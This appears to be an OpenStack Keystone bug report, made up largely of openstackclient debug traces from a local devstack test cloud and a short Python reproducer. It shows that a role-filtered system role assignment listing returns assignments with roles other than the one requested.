'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 
'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10.0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": 
[{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["JVQCRxBoTUyzm2CqiCoj6w"], "issued_at": "2019-10-04T18:56:29.000000Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, project=None, project_domain=None, quote_mode='nonnumeric', role=None, role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["U9Z3md9YTP-9-bTLuPDIzg"], "issued_at": "2019-10-04T18:56:29.000000Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}042443671367aa0183e15fd2692bf4c70d15050bdac46db883fd836440ae1065" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&include_names=True HTTP/1.1" 200 2401 RESP: [200] Connection: close Content-Length: 2401 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token 
x-openstack-request-id: req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "c814cd4739bd4960ad08ade3814f1560", "name": "system-admins"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/c814cd4739bd4960ad08ade3814f1560/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0ec0eb48c66d4fb79c432a2ff8c5d257", "name": "admin"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0ec0eb48c66d4fb79c432a2ff8c5d257/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "e8fec49e15984aedb5e1235f279434fe", "name": "auditor"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/e8fec49e15984aedb5e1235f279434fe/roles/7ee093f4ccf345bba963ce765f9b797f"}}], "links": {"self": "http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True used request id req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | admin | | system-admins at Default | | | all | False | | reader | | system-auditors at Default | | | all | False | | admin | admin at Default | | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | | reader | auditor at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 The Trace above lists all system role assignments to confirm my setup locally. 
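The discrepancy can also be reproduced straight against the API, independent of openstackclient: every assignment returned by a role-filtered call should carry the requested role id. A minimal sketch (python-requests; the endpoint and role id mirror the traces in this report, the token is a placeholder, and none of this is keystone code):

# check_role_filter.py -- hypothetical reproducer for this report.
import requests

KEYSTONE = 'http://10.0.3.122/identity/v3'           # endpoint from the trace
TOKEN = '<system-scoped admin token>'                 # placeholder
MEMBER_ROLE_ID = 'a8cd98f2e98d4135b2fa83950d6171ec'   # "member" in this cloud

resp = requests.get(
    KEYSTONE + '/role_assignments',
    params={'scope.system': 'all',
            'role.id': MEMBER_ROLE_ID,
            'include_names': 'True'},
    headers={'X-Auth-Token': TOKEN})
resp.raise_for_status()

for assignment in resp.json()['role_assignments']:
    role = assignment['role']
    if role['id'] != MEMBER_ROLE_ID:
        # This is the bug: the reader assignment of the system-auditors
        # group comes back even though the request filtered on member.
        print('unexpected role %s (%s) in filtered result'
              % (role['name'], role['id']))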
The following trace shows that the group is returned with the wrong role assignment based on the filter. $ openstack role assignment list --names --system all --role member --debug [1/880] START with options: role assignment list --names --system all --role member --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='',  auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domai n_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=F alse, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='',  passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_proje ct_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', usern ame='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'ne utron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_ version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 've rify': 
True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interfa ce': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': 
u'2', u'message': u'', u'image_format': u'q cow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_ti meout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tas ks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_h elp': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:49 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-d5 784d4c-7b47-4647-b912-65e6a78b835e RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10. 
0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-d5784d4c-7b47-4647-b912-65e6a78b835e Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:49.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["SGRaWT8BTVuzELGwxqjBdg"], "issued_at": "2019-10-04T18:56:49.000000 Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, pro ject=None, project_domain=None, quote_mode='nonnumeric', role=u'member', role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:50.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["2nu0u-1wQRmWA9_uS2hZ-g"], "issued_at": "2019-10-04T18:56:50.000000 Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles/member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: 
{SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles/member HTTP/1.1" 404 84 RESP: [404] Connection: close Content-Length: 84 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-88bce424-60f2-4d2a-a6f5-2bd256602789 RESP BODY: {"error":{"code":404,"message":"Could not find role: member.","title":"Not Found"}} GET call to identity for http://10.0.3.122/identity/v3/roles/member used request id req-88bce424-60f2-4d2a-a6f5-2bd256602789 Request returned failure status: 404 REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles?name=member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles?name=member HTTP/1.1" 200 322 RESP: [200] Connection: close Content-Length: 322 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-ce429b68-b53d-4c49-9080-ed3da3bce55b RESP BODY: {"links": {"self": "http://10.0.3.122/identity/v3/roles?name=member", "previous": null, "next": null}, "roles": [{"description": null, "links": {"self": "http://10.0.3.122/identity/v3/roles/a8cd98f2e98d4135b2fa83950d6171ec"}, " options": {}, "id": "a8cd98f2e98d4135b2fa83950d6171ec", "domain_id": null, "name": "member"}]} GET call to identity for http://10.0.3.122/identity/v3/roles?name=member used request id req-ce429b68-b53d-4c49-9080-ed3da3bce55b REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA 256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True HTTP/1.1" 200 1328 RESP: [200] Connection: close Content-Length: 1328 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-08f9bdb9-149d-4905-96cc-99b87c8b6339 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e" , "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba74 7046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914 e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id":  "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": 
"http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up 